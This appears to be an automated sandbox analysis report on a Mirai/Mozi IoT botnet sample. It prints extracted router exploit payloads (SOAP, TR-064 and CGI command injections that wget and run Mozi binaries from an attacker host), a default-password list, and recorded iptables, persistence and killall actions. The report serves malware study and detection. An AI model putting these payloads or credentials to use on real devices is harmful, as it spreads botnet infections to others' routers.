                            Source: Initial sampleString containing 'busybox' found: me./.i %d %d %d %d %d;./Runn;/bin/busybox echo -e '%s'
                            Source: Initial sampleString containing 'busybox' found: nvalidailedncorrecteniedoodbyebad$ELFshelldvrdvswelcomesuccessmdm96259615-cdpF6connectedBCM#usernamepass>/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://%s:%d/i ||curl -O http://%s:%d/i ||/bin/busybox wget http://%s:%d/i;chmod 777 i ||(cp /bin/ls ii;cat i>ii &&rm i;cp ii i;rm ii);./i;/bin/busybox echo -e '%s'
                            Source: Initial sampleString containing 'busybox' found: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g %s:%d -l /tmp/huawei -r /Mozi.m;chmod -x huawei;/tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                            Source: Initial sampleString containing 'busybox' found: <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><SOAP-ENV:Body><u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1&qu ot;><NewNTPServer1>`cd /tmp && rm -rf * && /bin/busybox wget http://%s:%d/Mozi.m && chmod 777 /tmp/tr064 && /tmp/tr064 tr064`</NewNTPServer1><NewNTPServer2>`echo DEATH`</NewNTPServer2><NewNTPServer3>`echo DEATH`</NewNTPServer3><NewNTPServer4>`echo DEATH`</NewNTPServer4><NewNTPServer5>`echo DEATH`</NewNTPServer5></u:SetNTPServers></SOAP-ENV:Body></SOAP-ENV:Envelope>
                            Source: Initial sampleString containing potential weak password found: admin
                            Source: Initial sampleString containing potential weak password found: default
                            Source: Initial sampleString containing potential weak password found: support
                            Source: Initial sampleString containing potential weak password found: service
                            Source: Initial sampleString containing potential weak password found: supervisor
                            Source: Initial sampleString containing potential weak password found: guest
                            Source: Initial sampleString containing potential weak password found: administrator
                            Source: Initial sampleString containing potential weak password found: 123456
                            Source: Initial sampleString containing potential weak password found: 54321
                            Source: Initial sampleString containing potential weak password found: password
                            Source: Initial sampleString containing potential weak password found: 12345
                            Source: Initial sampleString containing potential weak password found: admin1234
                            Source: Initial samplePotential command found: GET /c HTTP/1.0
                            Source: Initial samplePotential command found: GET %s HTTP/1.1
                            Source: Initial samplePotential command found: GET /c
                            Source: Initial samplePotential command found: GET /Mozi.6 HTTP/1.0
                            Source: Initial samplePotential command found: GET /Mozi.7 HTTP/1.0
                            Source: Initial samplePotential command found: GET /Mozi.c HTTP/1.0
                            Source: Initial samplePotential command found: GET /Mozi.m HTTP/1.0
                            Source: Initial samplePotential command found: GET /Mozi.x HTTP/1.0
                            Source: Initial samplePotential command found: GET /Mozi.a HTTP/1.0
                            Source: Initial samplePotential command found: GET /Mozi.s HTTP/1.0
                            Source: Initial samplePotential command found: GET /Mozi.r HTTP/1.0
                            Source: Initial samplePotential command found: GET /Mozi.b HTTP/1.0
                            Source: Initial samplePotential command found: GET /Mozi.4 HTTP/1.0
                            Source: Initial samplePotential command found: GET /Mozi.k HTTP/1.0
                            Source: Initial samplePotential command found: GET /Mozi.l HTTP/1.0
                            Source: Initial samplePotential command found: GET /Mozi.p HTTP/1.0
                            Source: Initial samplePotential command found: GET /%s HTTP/1.1
                            Source: Initial samplePotential command found: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://%s:%d/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: Initial samplePotential command found: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://%s:%d/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: Initial samplePotential command found: GET /shell?cd+/tmp;rm+-rf+*;wget+http://%s:%d/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1
                            Source: Initial samplePotential command found: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://%s:%d/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.m
                            Source: Initial samplePotential command found: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://%s:%d/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcron
                            Source: ELF static info symbol of initial sample.symtab present: no
                            Source: bin.sh.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_5c62e6b2 reference_sample = 91642663793bdda93928597ff1ac6087e4c1e5d020a8f40f2140e9471ab730f9, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 39501003c45c89d6a08f71fbf9c442bcc952afc5f1a1eb7b5af2d4b7633698a8, id = 5c62e6b2-9f6a-4c6d-b3fc-c6cbc8cf0b4b, last_modified = 2021-09-16
                            Source: bin.sh.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_77137320 reference_sample = 91642663793bdda93928597ff1ac6087e4c1e5d020a8f40f2140e9471ab730f9, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = afeedf7fb287320c70a2889f43bc36a3047528204e1de45c4ac07898187d136b, id = 77137320-6c7e-4bb8-81a4-bd422049c309, last_modified = 2021-09-16
                            Source: bin.sh.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_ac253e4f reference_sample = 91642663793bdda93928597ff1ac6087e4c1e5d020a8f40f2140e9471ab730f9, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = e2eee1f72b8c2dbf68e57b721c481a5cd85296e844059decc3548e7a6dc28fea, id = ac253e4f-b628-4dd0-91f1-f19099286992, last_modified = 2021-09-16
                            Source: 6242.1.00007fb730017000.00007fb730058000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_5c62e6b2 reference_sample = 91642663793bdda93928597ff1ac6087e4c1e5d020a8f40f2140e9471ab730f9, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 39501003c45c89d6a08f71fbf9c442bcc952afc5f1a1eb7b5af2d4b7633698a8, id = 5c62e6b2-9f6a-4c6d-b3fc-c6cbc8cf0b4b, last_modified = 2021-09-16
                            Source: 6242.1.00007fb730017000.00007fb730058000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_77137320 reference_sample = 91642663793bdda93928597ff1ac6087e4c1e5d020a8f40f2140e9471ab730f9, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = afeedf7fb287320c70a2889f43bc36a3047528204e1de45c4ac07898187d136b, id = 77137320-6c7e-4bb8-81a4-bd422049c309, last_modified = 2021-09-16
                            Source: 6242.1.00007fb730017000.00007fb730058000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_ac253e4f reference_sample = 91642663793bdda93928597ff1ac6087e4c1e5d020a8f40f2140e9471ab730f9, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = e2eee1f72b8c2dbf68e57b721c481a5cd85296e844059decc3548e7a6dc28fea, id = ac253e4f-b628-4dd0-91f1-f19099286992, last_modified = 2021-09-16
                            Source: 6240.1.00007fb730017000.00007fb730058000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_5c62e6b2 reference_sample = 91642663793bdda93928597ff1ac6087e4c1e5d020a8f40f2140e9471ab730f9, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 39501003c45c89d6a08f71fbf9c442bcc952afc5f1a1eb7b5af2d4b7633698a8, id = 5c62e6b2-9f6a-4c6d-b3fc-c6cbc8cf0b4b, last_modified = 2021-09-16
                            Source: 6240.1.00007fb730017000.00007fb730058000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_77137320 reference_sample = 91642663793bdda93928597ff1ac6087e4c1e5d020a8f40f2140e9471ab730f9, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = afeedf7fb287320c70a2889f43bc36a3047528204e1de45c4ac07898187d136b, id = 77137320-6c7e-4bb8-81a4-bd422049c309, last_modified = 2021-09-16
                            Source: 6240.1.00007fb730017000.00007fb730058000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_ac253e4f reference_sample = 91642663793bdda93928597ff1ac6087e4c1e5d020a8f40f2140e9471ab730f9, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = e2eee1f72b8c2dbf68e57b721c481a5cd85296e844059decc3548e7a6dc28fea, id = ac253e4f-b628-4dd0-91f1-f19099286992, last_modified = 2021-09-16
                            Source: /usr/networks, type: DROPPEDMatched rule: Linux_Trojan_Mirai_5c62e6b2 reference_sample = 91642663793bdda93928597ff1ac6087e4c1e5d020a8f40f2140e9471ab730f9, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 39501003c45c89d6a08f71fbf9c442bcc952afc5f1a1eb7b5af2d4b7633698a8, id = 5c62e6b2-9f6a-4c6d-b3fc-c6cbc8cf0b4b, last_modified = 2021-09-16
                            Source: /usr/networks, type: DROPPEDMatched rule: Linux_Trojan_Mirai_77137320 reference_sample = 91642663793bdda93928597ff1ac6087e4c1e5d020a8f40f2140e9471ab730f9, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = afeedf7fb287320c70a2889f43bc36a3047528204e1de45c4ac07898187d136b, id = 77137320-6c7e-4bb8-81a4-bd422049c309, last_modified = 2021-09-16
                            Source: /usr/networks, type: DROPPEDMatched rule: Linux_Trojan_Mirai_ac253e4f reference_sample = 91642663793bdda93928597ff1ac6087e4c1e5d020a8f40f2140e9471ab730f9, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = e2eee1f72b8c2dbf68e57b721c481a5cd85296e844059decc3548e7a6dc28fea, id = ac253e4f-b628-4dd0-91f1-f19099286992, last_modified = 2021-09-16
                            Source: classification engineClassification label: mal100.spre.troj.evad.linELF@0/486@73/0

                            Persistence and Installation Behavior

                            barindex
                            Source: /bin/sh (PID: 6275)Iptables executable using switch for changing the iptables rules: /usr/sbin/iptables -> iptables -I INPUT -p tcp --destination-port 57285 -j ACCEPTJump to behavior
                            Source: /bin/sh (PID: 6282)Iptables executable using switch for changing the iptables rules: /usr/sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 57285 -j ACCEPTJump to behavior
                            Source: /bin/sh (PID: 6285)Iptables executable using switch for changing the iptables rules: /usr/sbin/iptables -> iptables -I PREROUTING -t nat -p tcp --destination-port 57285 -j ACCEPTJump to behavior
                            Source: /bin/sh (PID: 6290)Iptables executable using switch for changing the iptables rules: /usr/sbin/iptables -> iptables -I POSTROUTING -t nat -p tcp --source-port 57285 -j ACCEPTJump to behavior
                            Source: /bin/sh (PID: 6293)Iptables executable using switch for changing the iptables rules: /usr/sbin/iptables -> iptables -I INPUT -p tcp --dport 57285 -j ACCEPTJump to behavior
                            Source: /bin/sh (PID: 6296)Iptables executable using switch for changing the iptables rules: /usr/sbin/iptables -> iptables -I OUTPUT -p tcp --sport 57285 -j ACCEPTJump to behavior
                            Source: /bin/sh (PID: 6299)Iptables executable using switch for changing the iptables rules: /usr/sbin/iptables -> iptables -I PREROUTING -t nat -p tcp --dport 57285 -j ACCEPTJump to behavior
                            Source: /bin/sh (PID: 6302)Iptables executable using switch for changing the iptables rules: /usr/sbin/iptables -> iptables -I POSTROUTING -t nat -p tcp --sport 57285 -j ACCEPTJump to behavior
                            Source: /bin/sh (PID: 6328)Iptables executable using switch for changing the iptables rules: /usr/sbin/iptables -> iptables -I INPUT -p tcp --destination-port 58000 -j DROPJump to behavior
                            Source: /bin/sh (PID: 6331)Iptables executable using switch for changing the iptables rules: /usr/sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 58000 -j DROPJump to behavior
                            Source: /bin/sh (PID: 6334)Iptables executable using switch for changing the iptables rules: /usr/sbin/iptables -> iptables -I INPUT -p tcp --dport 58000 -j DROPJump to behavior
                            Source: /bin/sh (PID: 6337)Iptables executable using switch for changing the iptables rules: /usr/sbin/iptables -> iptables -I OUTPUT -p tcp --sport 58000 -j DROPJump to behavior
                            Source: /bin/sh (PID: 6344)Iptables executable using switch for changing the iptables rules: /usr/sbin/iptables -> iptables -I INPUT -p tcp --destination-port 35000 -j DROPJump to behavior
                            Source: /bin/sh (PID: 6347)Iptables executable using switch for changing the iptables rules: /usr/sbin/iptables -> iptables -I INPUT -p tcp --destination-port 50023 -j DROPJump to behavior
                            Source: /bin/sh (PID: 6350)Iptables executable using switch for changing the iptables rules: /usr/sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 50023 -j DROPJump to behavior
                            Source: /bin/sh (PID: 6353)Iptables executable using switch for changing the iptables rules: /usr/sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 35000 -j DROPJump to behavior
                            Source: /bin/sh (PID: 6356)Iptables executable using switch for changing the iptables rules: /usr/sbin/iptables -> iptables -I INPUT -p tcp --destination-port 7547 -j DROPJump to behavior
                            Source: /bin/sh (PID: 6359)Iptables executable using switch for changing the iptables rules: /usr/sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 7547 -j DROPJump to behavior
                            Source: /bin/sh (PID: 6366)Iptables executable using switch for changing the iptables rules: /usr/sbin/iptables -> iptables -I INPUT -p tcp --dport 35000 -j DROPJump to behavior
                            Source: /bin/sh (PID: 6369)Iptables executable using switch for changing the iptables rules: /usr/sbin/iptables -> iptables -I INPUT -p tcp --dport 50023 -j DROPJump to behavior
                            Source: /bin/sh (PID: 6377)Iptables executable using switch for changing the iptables rules: /usr/sbin/iptables -> iptables -I OUTPUT -p tcp --sport 50023 -j DROPJump to behavior
                            Source: /bin/sh (PID: 6380)Iptables executable using switch for changing the iptables rules: /usr/sbin/iptables -> iptables -I OUTPUT -p tcp --sport 35000 -j DROPJump to behavior
                            Source: /bin/sh (PID: 6387)Iptables executable using switch for changing the iptables rules: /usr/sbin/iptables -> iptables -I INPUT -p tcp --dport 7547 -j DROPJump to behavior
                            Source: /bin/sh (PID: 6393)Iptables executable using switch for changing the iptables rules: /usr/sbin/iptables -> iptables -I OUTPUT -p tcp --sport 7547 -j DROPJump to behavior
                            Source: /bin/sh (PID: 6401)Iptables executable using switch for changing the iptables rules: /usr/sbin/iptables -> iptables -I INPUT -p udp --destination-port 60815 -j ACCEPTJump to behavior
                            Source: /bin/sh (PID: 6404)Iptables executable using switch for changing the iptables rules: /usr/sbin/iptables -> iptables -I OUTPUT -p udp --source-port 60815 -j ACCEPTJump to behavior
                            Source: /bin/sh (PID: 6407)Iptables executable using switch for changing the iptables rules: /usr/sbin/iptables -> iptables -I PREROUTING -t nat -p udp --destination-port 60815 -j ACCEPTJump to behavior
                            Source: /bin/sh (PID: 6414)Iptables executable using switch for changing the iptables rules: /usr/sbin/iptables -> iptables -I POSTROUTING -t nat -p udp --source-port 60815 -j ACCEPTJump to behavior
                            Source: /bin/sh (PID: 6420)Iptables executable using switch for changing the iptables rules: /usr/sbin/iptables -> iptables -I INPUT -p udp --dport 60815 -j ACCEPTJump to behavior
                            Source: /bin/sh (PID: 6426)Iptables executable using switch for changing the iptables rules: /usr/sbin/iptables -> iptables -I OUTPUT -p udp --sport 60815 -j ACCEPTJump to behavior
                            Source: /bin/sh (PID: 6432)Iptables executable using switch for changing the iptables rules: /usr/sbin/iptables -> iptables -I PREROUTING -t nat -p udp --dport 60815 -j ACCEPTJump to behavior
                            Source: /bin/sh (PID: 6438)Iptables executable using switch for changing the iptables rules: /usr/sbin/iptables -> iptables -I POSTROUTING -t nat -p udp --sport 60815 -j ACCEPTJump to behavior
                            Source: /tmp/bin.sh.elf (PID: 6244)File: /proc/6244/mountsJump to behavior
                            Source: /tmp/bin.sh.elf (PID: 6244)File: /etc/profile.d/cedilla-portuguese.shJump to behavior
                            Source: /tmp/bin.sh.elf (PID: 6244)File: /etc/profile.d/im-config_wayland.shJump to behavior
                            Source: /tmp/bin.sh.elf (PID: 6244)File: /etc/profile.d/gawk.shJump to behavior
                            Source: /tmp/bin.sh.elf (PID: 6244)File: /etc/profile.d/01-locale-fix.shJump to behavior
                            Source: /tmp/bin.sh.elf (PID: 6244)File: /etc/profile.d/apps-bin-path.shJump to behavior
                            Source: /tmp/bin.sh.elf (PID: 6244)File: /etc/profile.d/Z99-cloudinit-warnings.shJump to behavior
                            Source: /tmp/bin.sh.elf (PID: 6244)File: /etc/profile.d/vte-2.91.shJump to behavior
                            Source: /tmp/bin.sh.elf (PID: 6244)File: /etc/profile.d/Z97-byobu.shJump to behavior
                            Source: /tmp/bin.sh.elf (PID: 6244)File: /etc/profile.d/Z99-cloud-locale-test.shJump to behavior
                            Source: /tmp/bin.sh.elf (PID: 6244)File: /etc/profile.d/xdg_dirs_desktop_session.shJump to behavior
                            Source: /tmp/bin.sh.elf (PID: 6244)File: /etc/profile.d/bash_completion.shJump to behavior
                            Source: /tmp/bin.sh.elf (PID: 6244)File: /etc/rcS.d/S95baby.shJump to behavior
                            Source: /tmp/bin.sh.elf (PID: 6244)File: /etc/rcS.d/S95baby.sh (bits: - usr: rx grp: rx all: rwx)Jump to behavior
                            Source: /tmp/bin.sh.elf (PID: 6244)File: /etc/init.d/S95baby.sh (bits: - usr: rx grp: rx all: rwx)Jump to behavior
                            Source: /bin/sh (PID: 6252)Killall command executed: killall -9 telnetd utelnetd scfgmgrJump to behavior
                            Source: /tmp/bin.sh.elf (PID: 6240)File: /tmp/.ipsJump to behavior
                            Source: /tmp/bin.sh.elf (PID: 6244)Directory: //run/speech-dispatcher/.cacheJump to behavior
                            Source: /tmp/bin.sh.elf (PID: 6244)Directory: //home/saturnino/.mozillaJump to behavior
                            Source: /tmp/bin.sh.elf (PID: 6244)Directory: //home/saturnino/.cacheJump to behavior
                            Source: /tmp/bin.sh.elf (PID: 6244)Directory: //home/saturnino/.gnupgJump to behavior
                            Source: /tmp/bin.sh.elf (PID: 6244)Directory: //home/saturnino/.configJump to behavior
                            Source: /tmp/bin.sh.elf (PID: 6244)Directory: //home/saturnino/.localJump to behavior
                            Source: /tmp/bin.sh.elf (PID: 6244)Directory: //etc/.javaJump to behavior
                            Source: /tmp/bin.sh.elf (PID: 6244)Directory: //etc/.java/.systemPrefsJump to behavior
                            Source: /tmp/bin.sh.elf (PID: 6244)Directory: //etc/skel/.configJump to behavior
                            Source: /tmp/bin.sh.elf (PID: 6253)Directory: /tmp/.configJump to behavior
                            Source: /tmp/bin.sh.elf (PID: 6261)Directory: /tmp/.configJump to behavior
                            Source: /tmp/bin.sh.elf (PID: 6265)Directory: /tmp/.ipsJump to behavior
                            Source: /tmp/bin.sh.elf (PID: 6265)Directory: /tmp/.configJump to behavior
                            Source: /tmp/bin.sh.elf (PID: 6271)Directory: /tmp/.configJump to behavior
                            Source: /tmp/bin.sh.elf (PID: 6240)Empty hidden file: /tmp/.ipsJump to behavior
                            Source: /usr/bin/killall (PID: 6252)File opened: /proc/1582/statJump to behavior
                            Source: /usr/bin/killall (PID: 6252)File opened: /proc/3088/statJump to behavior
                            Source: /usr/bin/killall (PID: 6252)File opened: /proc/230/statJump to behavior
                            Source: /usr/bin/killall (PID: 6252)File opened: /proc/110/statJump to behavior
                            Source: /usr/bin/killall (PID: 6252)File opened: /proc/231/statJump to behavior
                            Source: /usr/bin/killall (PID: 6252)File opened: /proc/111/statJump to behavior
                            Source: /usr/bin/killall (PID: 6252)File opened: /proc/232/statJump to behavior
                            Source: /usr/bin/killall (PID: 6252)File opened: /proc/1579/statJump to behavior
                            Source: /usr/bin/killall (PID: 6252)File opened: /proc/112/statJump to behavior
                            Source: /usr/bin/killall (PID: 6252)File opened: /proc/233/statJump to behavior
                            Source: /usr/bin/killall (PID: 6252)File opened: /proc/1699/statJump to behavior
                            Source: /usr/bin/killall (PID: 6252)File opened: /proc/113/statJump to behavior
                            Source: /usr/bin/killall (PID: 6252)File opened: /proc/234/statJump to behavior
                            Source: /usr/bin/killall (PID: 6252)File opened: /proc/1335/statJump to behavior
                            Source: /usr/bin/killall (PID: 6252)File opened: /proc/1698/statJump to behavior
                            Source: /usr/bin/killall (PID: 6252)File opened: /proc/114/statJump to behavior
                            Source: /usr/bin/killall (PID: 6252)File opened: /proc/235/statJump to behavior
                            Source: /usr/bin/killall (PID: 6252)File opened: /proc/1334/statJump to behavior
                            Source: /usr/bin/killall (PID: 6252)File opened: /proc/1576/statJump to behavior
                            Source: /usr/bin/killall (PID: 6252)File opened: /proc/2302/statJump to behavior
                            Source: /usr/bin/killall (PID: 6252)File opened: /proc/115/statJump to behavior
                            Source: /usr/bin/killall (PID: 6252)File opened: /proc/236/statJump to behavior
                            Source: /usr/bin/killall (PID: 6252)File opened: /proc/116/statJump to behavior
                            Source: /usr/bin/killall (PID: 6252)File opened: /proc/237/statJump to behavior
                            Source: /usr/bin/killall (PID: 6252)File opened: /proc/117/statJump to behavior
                            Source: /usr/bin/killall (PID: 6252)File opened: /proc/118/statJump to behavior
                            Source: /usr/bin/killall (PID: 6252)File opened: /proc/910/statJump to behavior
                            Source: /usr/bin/killall (PID: 6252)File opened: /proc/119/statJump to behavior
                            Source: /usr/bin/killall (PID: 6252)File opened: /proc/912/statJump to behavior
                            Source: /usr/bin/killall (PID: 6252)File opened: /proc/10/statJump to behavior
                            Source: /usr/bin/killall (PID: 6252)File opened: /proc/2307/statJump to behavior
                            Source: /usr/bin/killall (PID: 6252)File opened: /proc/11/statJump to behavior
                            Source: /usr/bin/killall (PID: 6252)File opened: /proc/918/statJump to behavior
                            Source: /usr/bin/killall (PID: 6252)File opened: /proc/12/statJump to behavior
                            Source: /usr/bin/killall (PID: 6252)File opened: /proc/6240/statJump to behavior
                            Source: /usr/bin/killall (PID: 6252)File opened: /proc/13/statJump to behavior
                            Source: /usr/bin/killall (PID: 6252)File opened: /proc/14/statJump to behavior
                            Source: /usr/bin/killall (PID: 6252)File opened: /proc/15/statJump to behavior
                            Source: /usr/bin/killall (PID: 6252)File opened: /proc/16/statJump to behavior
                            Source: /usr/bin/killall (PID: 6252)File opened: /proc/6244/statJump to behavior
                            Source: /usr/bin/killall (PID: 6252)File opened: /proc/17/statJump to behavior
                            Source: /usr/bin/killall (PID: 6252)File opened: /proc/18/statJump to behavior
                            Source: /usr/bin/killall (PID: 6252)File opened: /proc/6246/statJump to behavior
                            Source: /usr/bin/killall (PID: 6252)File opened: /proc/1594/statJump to behavior
                            Source: /usr/bin/killall (PID: 6252)File opened: /proc/120/statJump to behavior
                            Source: /usr/bin/killall (PID: 6252)File opened: /proc/121/statJump to behavior
                            Source: /usr/bin/killall (PID: 6252)File opened: /proc/1349/statJump to behavior
                            Source: /usr/bin/killall (PID: 6252)File opened: /proc/1/statJump to behavior
                            Source: /usr/bin/killall (PID: 6252)File opened: /proc/122/statJump to behavior
                            Source: /usr/bin/killall (PID: 6252)File opened: /proc/243/statJump to behavior
                            Source: /usr/bin/killall (PID: 6252)File opened: /proc/123/statJump to behavior
                            Source: /usr/bin/killall (PID: 6252)File opened: /proc/2/statJump to behavior
                            Source: /usr/bin/killall (PID: 6252)File opened: /proc/124/statJump to behavior
                            Source: /usr/bin/killall (PID: 6252)File opened: /proc/3/statJump to behavior
                            Source: /usr/bin/killall (PID: 6252)File opened: /proc/4/statJump to behavior
                            Source: /usr/bin/killall (PID: 6252)File opened: /proc/125/statJump to behavior
                            Source: /usr/bin/killall (PID: 6252)File opened: /proc/126/statJump to behavior
                            Source: /usr/bin/killall (PID: 6252)File opened: /proc/1344/statJump to behavior
                            Source: /usr/bin/killall (PID: 6252)File opened: /proc/1465/statJump to behavior
                            Source: /usr/bin/killall (PID: 6252)File opened: /proc/1586/statJump to behavior
                            Source: /usr/bin/killall (PID: 6252)File opened: /proc/127/statJump to behavior
                            Source: /usr/bin/killall (PID: 6252)File opened: /proc/6/statJump to behavior
                            Source: /usr/bin/killall (PID: 6252)File opened: /proc/248/statJump to behavior
                            Source: /usr/bin/killall (PID: 6252)File opened: /proc/128/statJump to behavior
                            Source: /usr/bin/killall (PID: 6252)File opened: /proc/249/statJump to behavior
                            Source: /usr/bin/killall (PID: 6252)File opened: /proc/1463/statJump to behavior
                            Source: /usr/bin/killall (PID: 6252)File opened: /proc/800/statJump to behavior
                            Source: /usr/bin/killall (PID: 6252)File opened: /proc/9/statJump to behavior
                            Source: /usr/bin/killall (PID: 6252)File opened: /proc/801/statJump to behavior
                            Source: /usr/bin/killall (PID: 6252)File opened: /proc/20/statJump to behavior
                            Source: /usr/bin/killall (PID: 6252)File opened: /proc/21/statJump to behavior
                            Source: /usr/bin/killall (PID: 6252)File opened: /proc/1900/statJump to behavior
                            Source: /usr/bin/killall (PID: 6252)File opened: /proc/22/statJump to behavior
                            Source: /usr/bin/killall (PID: 6252)File opened: /proc/23/statJump to behavior
                            Source: /usr/bin/killall (PID: 6252)File opened: /proc/24/statJump to behavior
                            Source: /usr/bin/killall (PID: 6252)File opened: /proc/6133/statJump to behavior
                            Source: /usr/bin/killall (PID: 6252)File opened: /proc/25/statJump to behavior
                            Source: /usr/bin/killall (PID: 6252)File opened: /proc/26/statJump to behavior
                            Source: /usr/bin/killall (PID: 6252)File opened: /proc/27/statJump to behavior
                            Source: /usr/bin/killall (PID: 6252)File opened: /proc/28/statJump to behavior
                            Source: /usr/bin/killall (PID: 6252)File opened: /proc/29/statJump to behavior
                            Source: /usr/bin/killall (PID: 6252)File opened: /proc/491/statJump to behavior
                            Source: /usr/bin/killall (PID: 6252)File opened: /proc/250/statJump to behavior
                            Source: /usr/bin/killall (PID: 6252)File opened: /proc/130/statJump to behavior
                            Source: /usr/bin/killall (PID: 6252)File opened: /proc/251/statJump to behavior
                            Source: /usr/bin/killall (PID: 6252)File opened: /proc/252/statJump to behavior
                            Source: /usr/bin/killall (PID: 6252)File opened: /proc/132/statJump to behavior
                            Source: /usr/bin/killall (PID: 6252)File opened: /proc/253/statJump to behavior
                            Source: /usr/bin/killall (PID: 6252)File opened: /proc/254/statJump to behavior
                            Source: /usr/bin/killall (PID: 6252)File opened: /proc/255/statJump to behavior
                            Source: /usr/bin/killall (PID: 6252)File opened: /proc/256/statJump to behavior
                            Source: /usr/bin/killall (PID: 6252)File opened: /proc/1599/statJump to behavior
                            Source: /usr/bin/killall (PID: 6252)File opened: /proc/257/statJump to behavior
                            Source: /usr/bin/killall (PID: 6252)File opened: /proc/1477/statJump to behavior
                            Source: /usr/bin/killall (PID: 6252)File opened: /proc/379/statJump to behavior
                            Source: /usr/bin/killall (PID: 6252)File opened: /proc/258/statJump to behavior
                            Source: /usr/bin/killall (PID: 6252)File opened: /proc/1476/statJump to behavior
                            Source: /usr/bin/killall (PID: 6252)File opened: /proc/259/statJump to behavior
                            Source: /usr/bin/killall (PID: 6252)File opened: /proc/1475/statJump to behavior
                            Source: /usr/bin/killall (PID: 6252)File opened: /proc/936/statJump to behavior
                            Source: /usr/bin/killall (PID: 6252)File opened: /proc/30/statJump to behavior
                            Source: /usr/bin/killall (PID: 6252)File opened: /proc/2208/statJump to behavior
                            Source: /usr/bin/killall (PID: 6252)File opened: /proc/35/statJump to behavior
                            Source: /usr/bin/killall (PID: 6252)File opened: /proc/1809/statJump to behavior
                            Source: /usr/bin/killall (PID: 6252)File opened: /proc/1494/statJump to behavior
                            Source: /tmp/bin.sh.elf (PID: 6246)Shell command executed: /bin/sh -c "killall -9 telnetd utelnetd scfgmgr"Jump to behavior
                            Source: /tmp/bin.sh.elf (PID: 6273)Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --destination-port 57285 -j ACCEPT"Jump to behavior
                            Source: /tmp/bin.sh.elf (PID: 6280)Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --source-port 57285 -j ACCEPT"Jump to behavior
                            Source: /tmp/bin.sh.elf (PID: 6283)Shell command executed: /bin/sh -c "iptables -I PREROUTING -t nat -p tcp --destination-port 57285 -j ACCEPT"Jump to behavior
                            Source: /tmp/bin.sh.elf (PID: 6288)Shell command executed: /bin/sh -c "iptables -I POSTROUTING -t nat -p tcp --source-port 57285 -j ACCEPT"Jump to behavior
                            Source: /tmp/bin.sh.elf (PID: 6291)Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --dport 57285 -j ACCEPT"Jump to behavior
                            Source: /tmp/bin.sh.elf (PID: 6294)Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --sport 57285 -j ACCEPT"Jump to behavior
